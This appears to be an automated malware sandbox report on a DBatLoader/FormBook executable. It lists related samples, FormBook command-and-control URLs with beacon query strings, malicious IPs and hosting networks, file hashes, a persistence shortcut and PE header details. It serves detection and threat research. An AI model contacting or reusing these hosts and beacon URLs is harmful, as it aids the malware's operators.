             | Order_confirmation,_Invoice.exe          | malicious | DBatLoader, FormBook  | www.kermisbedrijfkramer.online/ao65/?Urwl=Y9yn8u0REY9c1IpGc1acQeiywl67Bz4kR9nr06rl/WLBU1XMoiFOUgbvS2/Y+YwQBdR3MSzENA==&S0GhC=_R-phJeXT
             | INV#761538.exe                           | malicious | FormBook              | www.qa-manny.com/cvps/?kDuhz=t6NP562HYH_&pf5=YYStJbUf5TaZehAWHAdvcDwKkN8dqWyQyqo9RJP/Q7ViCmgow6wyh8/3RNpMerc2KWMLTTY6CI9NpXl7SvcbIbeUXgqX6DnaKg==
             | 137-AGROCHLOPECKI_OFFER_list.xls         | malicious | FormBook              | www.rocsys.net/g81o/?t8F43Dx=Xpn7ovWGDL38rcQsVj9M+fSKcj+67g3pDTSuqHneUyb3n+qAvdqStutd5ioDJ87L1Kdi6p0jXbywk+j2nUztgIlZl1ilwP64qP32EII=&xphPK=azPpsjMX1
             | NNL_PO_1023008.exe                       | malicious | FormBook, GuLoader    | www.rocsys.net/uaaq/?w89D=LxmD0p&UX=ZvgtLzuC5J0fwHYxUOhDE7BocrPe2y3vAv4ZEylVZ8S9BUo4tJK/O+Yy7erX60uFZvklPnpu2szjI2ePXJ09mUhv++5catqsVQ==
             | 003425425124526.exe                      | malicious | DBatLoader, FormBook  | www.kermisbedrijfkramer.online/ao65/?GR0=Y9yn8u0REY9c1IpGc1acQeiywl67Bz4kR9nr06rl/WLBU1XMoiFOUgbvS1HIoJcoA9wm&IDK=RJBh5RS0IZO8zhrP
             | Document.exe                             | malicious | FormBook              | www.qa-manny.com/cvps/?Tb-PA8s8=YYStJbUf5TaZehAWHAdvcDwKkN8dqWyQyqo9RJP/Q7ViCmgow6wyh8/3RNpMerc2KWMLTTY6CI9NpXl7SvcbIbeUXgqX6DnaKg==&0H=BrFhG8npvv
             | Hubnnuiisapctu.exe                       | malicious | DBatLoader, FormBook  | www.kermisbedrijfkramer.online/ao65/?2d=Y9yn8u0REY9c1IpGc1acQeiywl67Bz4kR9nr06rl/WLBU1XMoiFOUgbvS2/hhpQTPLNwMSzDew==&3fC=vZeTzRlX84SHE
             | Invoice.exe                              | malicious | Unknown               | www.wrautomotive.online/9hnx/?qjEABCG=x93wZY5flbcWgBQ+QBIan4Q/Fzujwl2X6zdiZc2Bln/4Iyn/0F+0HT2oZzLfP234arynxKxgoTzQXViUvY11cUD95//AJ74tDA==&KD=eYDR
             | Factura_1-000816pdf.exe                  | malicious | FormBook, GuLoader    | www.vdb2b.com/hedt/?iOOH=EEEIB&iC8-0=zKoVcsC5grZr6pX8QDgaiztoD/aYyGD3cWBaSuIr6nSXyRLF9phHpQybJRV7E4N8LdJP/dJhO/XvQgvS05+WXwT8k1ve1mAG6g==
             | PO-230803-S00.exe                        | malicious | FormBook              | www.carfactsandfigures.com/gpc9/?pfD=BKcV00kv5fthcsbc5kU6zPs22ZTUClXvYH44oRN9PBAu/J6uiY+GzzbdjWgGYpN/YmmZe7PBk+WcxYFhT8+AoQOkRQ9xiXX9HyxRaD3/mCeI&28=XrcXTyOAOYd9aU4
             | Proof_Of_Payment_&_Proforma_Invoice.exe  | malicious | FormBook              | www.carfactsandfigures.com/gpc9/?Qw=BKcV00kv5fthcsbc5kU6zPs22ZTUClXvYH44oRN9PBAu/J6uiY+GzzbdjWgGYpN/YmmZe7PBk+WcxYFhT8+AoWCpUiVji2f5FixRaDjUrieI&Cq=oXbgvbGl
             | Zpe3AgLpIk.exe                           | malicious | FormBook              | www.detail.tips/ug0e/?g3=/sYbaCMyVKUweyZqxZmWwv4r7cKEdyFMx5i/AVkPxJXLdrztci0N39LYxFfcAnRsf0n5uCI95iaxL3pmdgVmn4WmFlEKCSmNHQ==&aRz=TnxvzmvvZHhQa
             | cOqo5PZFXC.exe                           | malicious | FormBook              | www.detail.tips/ug0e/?T6N6=/sYbaCMyVKUweyZqxZmWwv4r7cKEdyFMx5i/AVkPxJXLdrztci0N39LYxFfcAnRsf0n5uCI95iaxL3pmdgVmzfuiO2sKUmKBQ8Ki8GsnQXiV&a23=vQfnLmKSaoS
             | qeUNNruKMS.exe                           | malicious | FormBook              | www.detail.tips/ug0e/?xGgP0=/sYbaCMyVKUweyZqxZmWwv4r7cKEdyFMx5i/AVkPxJXLdrztci0N39LYxFfcAnRsf0n5uCI95iaxL3pmdgVmzYXgBkUxTDmNB8Ki8FQ2d3iV&Ck=YjGWWgtgIy
             | FedEx Shipment doc.exe                   | malicious | FormBook              | www.detail.tips/ug0e/?uTe=/sYbaCMyVKUweyZqxZmWwv4r7cKEdyFMx5i/AVkPxJXLdrztci0N39LYxFfcAnRsf0n5uCI95iaxL3pmdgVmzYXgBkUxTDmNB8Ki8FQ2d3iV&C6qk1=WsHtTdU
Match           | Associated Sample Name / URL | Detection | Threat Name          | Context
www.hivaom.top  | 9008654324456.exe            | malicious | FormBook             | 156.237.159.158
                | 003425425124526.exe          | malicious | DBatLoader, FormBook | 156.237.159.158
                | Domgxpvqtdfgvx.exe           | malicious | DBatLoader, FormBook | 156.237.159.158
                | Hubnnuiisapctu.exe           | malicious | DBatLoader, FormBook | 156.237.159.158
                | Tcnpdxsfourrbk.exe           | malicious | DBatLoader, FormBook | 156.237.159.158
www.maltsky.net | Tcnpdxsfourrbk.exe           | malicious | DBatLoader, FormBook | 104.140.89.24
Match                               | Associated Sample Name / URL                                  | Detection | Threat Name           | Context
PRTL-DE                             | mZoYf6Nezj.exe                                                | malicious | FormBook              | 62.72.62.121
                                    | new_order_C00382023.exe                                       | malicious | FormBook              | 62.72.50.8
                                    | 9008654324456.exe                                             | malicious | FormBook              | 62.72.50.88
                                    | RFQ_034-3105-Ashworth.pdf.exe                                 | malicious | FormBook              | 62.72.50.8
                                    | wsxK69ydcg.dll                                                | malicious | JanelaRAT             | 62.72.22.134
                                    | wsxK69ydcg.dll                                                | malicious | JanelaRAT             | 62.72.22.134
                                    | x8TRXHYzP6.exe                                                | malicious | FormBook, NSISDropper | 62.72.50.217
                                    | New_order_98987006305#.doc                                    | malicious | FormBook, NSISDropper | 62.72.37.54
                                    | SecuriteInfo.com.FileRepMalware.2839.30700.exe                | malicious | FormBook, NSISDropper | 62.72.28.110
                                    | New_order_98987006305#.doc                                    | malicious | FormBook, NSISDropper | 62.72.37.54
                                    | about.md.ps1                                                  | malicious | Unknown               | 62.72.22.30
                                    | up.ps1                                                        | malicious | Unknown               | 62.72.22.30
                                    | md.ps1                                                        | malicious | Unknown               | 62.72.22.30
                                    | 8.ps1                                                         | malicious | Unknown               | 62.72.22.30
                                    | Purchase_Order.exe                                            | malicious | FormBook              | 62.72.50.34
                                    | Quote_Request.exe                                             | malicious | FormBook              | 62.72.37.60
                                    | bot.arm.elf                                                   | malicious | Mirai                 | 62.72.27.201
                                    | bot.x86.elf                                                   | malicious | Mirai                 | 62.72.27.201
                                    | bot.arm5.elf                                                  | malicious | Mirai                 | 62.72.27.201
                                    | bot.mips.elf                                                  | malicious | Mirai                 | 62.72.27.201
TEAMINTERNET-CA-ASCA                | file.exe                                                      | malicious | RedLine, SmokeLoader  | 104.247.82.52
                                    | http://lightenacquired.xyz                                    | malicious | Unknown               | 104.247.82.51
                                    | http://lightenacquired.xyz                                    | malicious | Unknown               | 104.247.82.51
                                    | Payment_$5,860.exe                                            | malicious | FormBook, NSISDropper | 104.247.82.91
                                    | G7DyaA9iz9.exe                                                | malicious | Pushdo                | 104.247.81.53
                                    | Statement_Pdf.exe                                             | malicious | FormBook, NSISDropper | 104.247.82.91
                                    | https://cookiescriptcdn.pro                                   | malicious | Unknown               | 104.247.81.210
                                    | Order_QR-00658.exe                                            | malicious | FormBook, NSISDropper | 104.247.82.92
                                    | THP-20381508-2023NP.exe                                       | malicious | FormBook, NSISDropper | 104.247.82.91
                                    | svcVJ3Ljwp.exe                                                | malicious | FormBook, NSISDropper | 104.247.82.90
                                    | RFQ-T56797W.xlsx                                              | malicious | FormBook, NSISDropper | 104.247.82.90
                                    | SecuriteInfo.com.Trojan.NSISX.Spy.Gen.24.14213.13511.exe      | malicious | FormBook, NSISDropper | 104.247.82.92
                                    | https://rj2bocejarqnpuhm.browsetor.com                        | malicious | Unknown               | 104.247.81.51
                                    | hRdqscagvv.exe                                                | malicious | FormBook              | 104.247.82.94
                                    | Scan.0893700083-SSG803.exe                                    | malicious | FormBook              | 104.247.82.93
                                    | Bhl9bymdkI.exe                                                | malicious | FormBook              | 104.247.82.94
                                    | GCeHcfCef8.exe                                                | malicious | FormBook              | 104.247.82.51
                                    | R56wchKh1g.exe                                                | malicious | FormBook, NSISDropper | 104.247.82.90
                                    | Quote_Request.exe                                             | malicious | FormBook              | 104.247.82.91
                                    | Hgh7WMRLzKPX09P.exe                                           | malicious | FormBook              | 104.247.82.90
TRANSIP-ASAmsterdamtheNetherlandsNL | Product_Specs.exe                                             | malicious | FormBook, GuLoader    | 37.97.254.27
                                    | PO_VCFGA1010.exe                                              | malicious | FormBook              | 37.97.254.27
                                    | 25-23PJSM-653.exe                                             | malicious | FormBook, GuLoader    | 37.97.254.27
                                    | PAGAMENTO_INV-85732.exe                                       | malicious | FormBook, NSISDropper | 37.97.254.27
                                    | file.exe                                                      | malicious | FormBook              | 37.97.254.27
                                    | kTnqWHyjjG.elf                                                | malicious | Mirai                 | 95.170.75.142
                                    | Order_confirmation,_Invoice.exe                               | malicious | DBatLoader, FormBook  | 37.97.254.27
                                    | ZenY9BAc8B.elf                                                | malicious | Mirai                 | 185.211.251.125
                                    | F00D0B21M4.elf                                                | malicious | Mirai                 | 37.97.214.109
                                    | INV#761538.exe                                                | malicious | FormBook              | 37.97.254.27
                                    | 137-AGROCHLOPECKI_OFFER_list.xls                              | malicious | FormBook              | 37.97.254.27
                                    | QISOVbNi9M.elf                                                | malicious | Mirai                 | 95.170.75.168
                                    | NNL_PO_1023008.exe                                            | malicious | FormBook, GuLoader    | 37.97.254.27
                                    | 003425425124526.exe                                           | malicious | DBatLoader, FormBook  | 37.97.254.27
                                    | Document.exe                                                  | malicious | FormBook              | 37.97.254.27
                                    | ut3u2l5ZlK.elf                                                | malicious | Mirai                 | 95.170.75.197
                                    | sora.x86.elf                                                  | malicious | Mirai                 | 149.210.216.118
                                    | RF_-_ORDER_8990387_REQUEST.exe                                | malicious | FormBook              | 86.105.245.69
                                    | arm.elf                                                       | malicious | Mirai                 | 149.210.216.117
                                    | ACH Remittance Statement on October 17 2023 at 023544 AM.msg  | malicious | HTMLPhisher           | 136.144.209.194
No context
No context

Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 65536
Entropy (8bit): 1.0904543046591975
Encrypted: false
SSDEEP: 96:9nFBpOykjsghhoI7Jf7QXIDcQvc6QcEVcw3cE/ME/+HbHgnoW6He4sFEh5Lk4Mb9:183jg0BU/AjUFLcUl3zuiF1Z24IO8o
MD5: A0FA6046F81A9B088F25EDB1B8056C6A
SHA1: D3F14291D15657E76785C11955C89307CCE65D6F
SHA-256: DAC5F0916DF55F879D19FE052011F5B896B00C9D0F4DF292FE9A6E61E5B03753
SHA-512: 1C457C3BBA34A9C6A308B35495180E3C6FB45570F9E14C7A7834445D29A14D7E3314E75C81424D3223F818EB627C4F2725DA10AC4CB50CE9777F1BF29FCBA725
Malicious: false
Reputation: low

Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Mini DuMP crash report, 15 streams, Thu Nov 30 13:56:55 2023, 0x1205a4 type
Category: dropped
Size (bytes): 129720
Entropy (8bit): 2.0975375590264504
Encrypted: false
SSDEEP: 768:UOPEdxUX+hHSBnJ1kgUBDLiA1MCuDv+ahrNC:UOHJrUBD71A+ahr4
MD5: 0E869B364F345A22BC9E2602125CC1F9
SHA1: 86ECF4BFED405C3CD49E5D34AC2C7E7BF7096AD1
SHA-256: 1A2CAC372A54D615EB3C858124B8E13094DA36339570B257C7D3EBB3561764F7
SHA-512: C014CA857F7F901DC2628E31BC3D665023ED8155A40A715D8A1238639C6D91FA4C6B8091763B84270746859545BDF296D964718631278B8BCEBB15EDC57A753E
Malicious: false
                                                                                                  Preview:MDMP..a..... .........he............D...............X............&...........`..........`.......8...........T...........pT..H............,..........................................................................................eJ..............GenuineIntel............T.......p.....he............................. ..2...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):8370
                                                                                                  Entropy (8bit):3.7003910711769294
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:R6l7wVeJxC6wYZ6Y2D8SUQRig2gmfACpr689bosTsfIqKm:R6lXJE6D6YBSU0ig2gmfA8os4fn7
                                                                                                  MD5:DFF139A0FD2EB5B90FB7CF5B2E45427F
                                                                                                  SHA1:CD873B43A740C5774AB958266E2A8EBF35001E61
                                                                                                  SHA-256:9E5BC0D2A615852BF73029C81BA20D44FF398BA9464DE569694F5B7D9F09EA05
                                                                                                  SHA-512:D7B465B6C3182CF8A9E16D78690B40F1053026E5B4E32FBAFB6525B83385D60641353F1E157AC573F639187E975569837342D5D9FA0DE4BD7ED3074A952DCB23
                                                                                                  Malicious:false
                                                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.6.8.<./.P.i.d.
                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4608
                                                                                                  Entropy (8bit):4.477773674076699
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:cvIwWl8zsxZJg77aI9qVWpW8VYNPYm8M4JAxGFQ+q8CN5YggWydd:uIjfpI7gk7VESJALYggWydd
                                                                                                  MD5:D0362946E470C127C856B35D1E6CA454
                                                                                                  SHA1:3C60ABDA81066F453069385A4F73BE1ECD1812B8
                                                                                                  SHA-256:BEA6C6CA1C576C5400C97E7EF7D74BD81361A82B1A5A42942EE923C5E592028D
                                                                                                  SHA-512:B9E32A4A6364DDC59AA4FA7833CEA313F4518F1B44DF63638AAEC4F6414B2F5680CEF267D6EBEEEDC269AD05521745BD3AB4072EB17CF62AE2D988C07726310E
                                                                                                  Malicious:false
                                                                                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="83819" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096
                                                                                                  Process:C:\Users\user\Desktop\Fpopgapwdcgvxn.exe
                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2403840
                                                                                                  Entropy (8bit):7.682310515830663
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:49152:UkQzWGa8pH8yc0/wU2lpe63ZrxKrVEbRIqiPt415Fehg1mQ5C:UNqGa8pcyV/wjpdZrxEVEtI14xqn
                                                                                                  MD5:072D323C28E7BA4D63EB7DF9894F33C9
                                                                                                  SHA1:CF6A2B1BA98BF303E93B4070919EC1CD30262377
                                                                                                  SHA-256:D164C7CE3856705552A7DCD91F577C12162D5EB522153E33E91F86536CAC5FB2
                                                                                                  SHA-512:348E888F90E8582BE54ACC4C39D9531EC333A3F9DEB5C7CC1C4D6DBF2CC094CBB744438D87D6D3A2357D2E2BE7141412744287249B465EB39217A3F0CFFB0A23
                                                                                                  Malicious:true
                                                                                                  Yara Hits:
                                                                                                  • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: C:\Users\Public\Libraries\Telragab.PIF, Author: Joe Security
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                  • Antivirus: ReversingLabs, Detection: 70%
                                                                                                  Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*............................H.............@...........................%..................@............................".z$...`#......................."..n............................".....................................................CODE................................ ..`DATA................................@...BSS..........."......r"..................idata..z$...."..&...r".............@....tls.........."......."..................rdata........".......".............@..P.reloc...n...."..p....".............@..P.rsrc........`#.......#.............@..P..............%.......$.............@..P........................................................................................................................................
                                                                                                  Process:C:\Users\user\Desktop\Fpopgapwdcgvxn.exe
                                                                                                  File Type:MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Telragab.PIF">), ASCII text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):99
                                                                                                  Entropy (8bit):5.00911795347448
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:HRAbABGQYmTWAX+rSF55i0XMqCajSsb5itKlv:HRYFVmTWDyzME5OK1
                                                                                                  MD5:4B33C52B0816C75AB35475CE6BF00E69
                                                                                                  SHA1:929F5ABCEA017613C901C185D58DFAC7F3FA1055
                                                                                                  SHA-256:22B4C7336EDB302C60B225DE9A971A8D4535DEC942FD24EBF239E3E7E9319DE2
                                                                                                  SHA-512:5DE9B3DE078C3A62E5AAB3E9E38CE1AC4C9843727E9BD60E1DBDF70102C56A55AE78CBDBDFEB2BFDE51AB3AFC96A3CAD7FB37AA94C7B9260673C4A809D34759A
                                                                                                  Malicious:false
                                                                                                  Preview:[InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Telragab.PIF"..IconIndex=12..HotKey=3..
                                                                                                  Process:C:\Windows\explorer.exe
                                                                                                  File Type:JSON data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1022
                                                                                                  Entropy (8bit):5.215200866635182
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:YqHZ6T06MhmamGgb0O0bihmVmGg6CUXyhmGNmGgbxdB6hm3mGgz0Jahm2mGgbNdh:YqHZ6T06McDTb0O0bic4TDUXycRTbxd/
                                                                                                  MD5:BA8512A1180143F7620E106FB9DF5F43
                                                                                                  SHA1:2EF20B9029C7C89ED134DD87F6A9403D4103031F
                                                                                                  SHA-256:171640BF14335CC6403F09E4C72C11146C7393E63A9273C71B98C2D456202BA9
                                                                                                  SHA-512:2B83F9321A98090269D610D552C19B06136719FCD9F310437B2852F938DED711A1D09EABF017BF9AAEA980F68CEC6703234808A5CAB74C9A52AE4903A0DAE797
                                                                                                  Malicious:false
                                                                                                  Preview:{"RecentItems":[{"AppID":"Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge","PenUsageSec":15,"LastSwitchedLowPart":3053123472,"LastSwitchedHighPart":31061843,"PrePopulated":true},{"AppID":"Microsoft.WindowsCommunicationsApps_8wekyb3d8bbwe!Microsoft.WindowsLive.Mail","PenUsageSec":15,"LastSwitchedLowPart":3043123472,"LastSwitchedHighPart":31061843,"PrePopulated":true},{"AppID":"Microsoft.Office.OneNote_8wekyb3d8bbwe!microsoft.onenoteim","PenUsageSec":15,"LastSwitchedLowPart":3033123472,"LastSwitchedHighPart":31061843,"PrePopulated":true},{"AppID":"Microsoft.Windows.Photos_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":3023123472,"LastSwitchedHighPart":31061843,"PrePopulated":true},{"AppID":"Microsoft.MSPaint_8wekyb3d8bbwe!Microsoft.MSPaint","PenUsageSec":15,"LastSwitchedLowPart":3013123472,"LastSwitchedHighPart":31061843,"PrePopulated":true},{"AppID":"Microsoft.WindowsMaps_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":3003123472,"LastSwitchedHighPart":31061843,
                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                  Entropy (8bit):7.682310515830663
                                                                                                  TrID:
                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.66%
                                                                                                  • Win32 Executable Delphi generic (14689/80) 0.15%
                                                                                                  • Windows Screen Saver (13104/52) 0.13%
                                                                                                  • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                  File name:Fpopgapwdcgvxn.exe
                                                                                                  File size:2'403'840 bytes
                                                                                                  MD5:072d323c28e7ba4d63eb7df9894f33c9
                                                                                                  SHA1:cf6a2b1ba98bf303e93b4070919ec1cd30262377
                                                                                                  SHA256:d164c7ce3856705552a7dcd91f577c12162d5eb522153e33e91f86536cac5fb2
                                                                                                  SHA512:348e888f90e8582be54acc4c39d9531ec333a3f9deb5c7cc1c4d6dbf2cc094cbb744438d87d6d3a2357d2e2be7141412744287249b465eb39217a3f0cffb0a23
                                                                                                  SSDEEP:49152:UkQzWGa8pH8yc0/wU2lpe63ZrxKrVEbRIqiPt415Fehg1mQ5C:UNqGa8pcyV/wjpdZrxEVEtI14xqn
                                                                                                  TLSH:58B5F112D5A18833D4F3177A8D4AAF7869263DC09F28B4C5F2DA7C8C76B834567241FA
                                                                                                  File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                                                                  Icon Hash:091ad4d45274bc4d
                                                                                                  Entrypoint:0x45f248
                                                                                                  Entrypoint Section:CODE
                                                                                                  Digitally signed:false
                                                                                                  Imagebase:0x400000
                                                                                                  Subsystem:windows gui
                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                                  DLL Characteristics:
                                                                                                  Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                                                  TLS Callbacks:
                                                                                                  CLR (.Net) Version:
                                                                                                  OS Version Major:4
                                                                                                  OS Version Minor:0
                                                                                                  File Version Major:4
                                                                                                  File Version Minor:0
                                                                                                  Subsystem Version Major:4
                                                                                                  Subsystem Version Minor:0
                                                                                                  Import Hash:68296516c32d32fc3260fa762049f34e
                                                                                                  Instruction
                                                                                                  push ebp
                                                                                                  mov ebp, esp
                                                                                                  add esp, FFFFFFF0h
                                                                                                  mov eax, 0045F060h
                                                                                                  call 00007FF2D4DB50ADh
                                                                                                  mov eax, dword ptr [0062871Ch]
                                                                                                  mov eax, dword ptr [eax]
                                                                                                  call 00007FF2D4E048C9h
                                                                                                  mov ecx, dword ptr [0062880Ch]
                                                                                                  mov eax, dword ptr [0062871Ch]
                                                                                                  mov eax, dword ptr [eax]
                                                                                                  mov edx, dword ptr [0045E4E4h]
                                                                                                  call 00007FF2D4E048C9h
                                                                                                  mov eax, dword ptr [0062871Ch]
                                                                                                  mov eax, dword ptr [eax]
                                                                                                  call 00007FF2D4E0493Dh
                                                                                                  call 00007FF2D4DB2E10h
                                                                                                  lea eax, dword ptr [eax+00h]
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x22a000         0x247a        .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x236000         0x1a400       .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x22f000         0x6ec4        .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x22e000         0x18          .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x0              0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
CODE | 0x1000 | 0x5e290 | 0x5e400 | False | 0.5204948607427056 | data | 6.538043127568022 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
DATA | 0x60000 | 0x1c88a0 | 0x1c8a00 | False | 0.8356733763345195 | data | 7.7565677030373665 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
BSS | 0x229000 | 0xc91 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
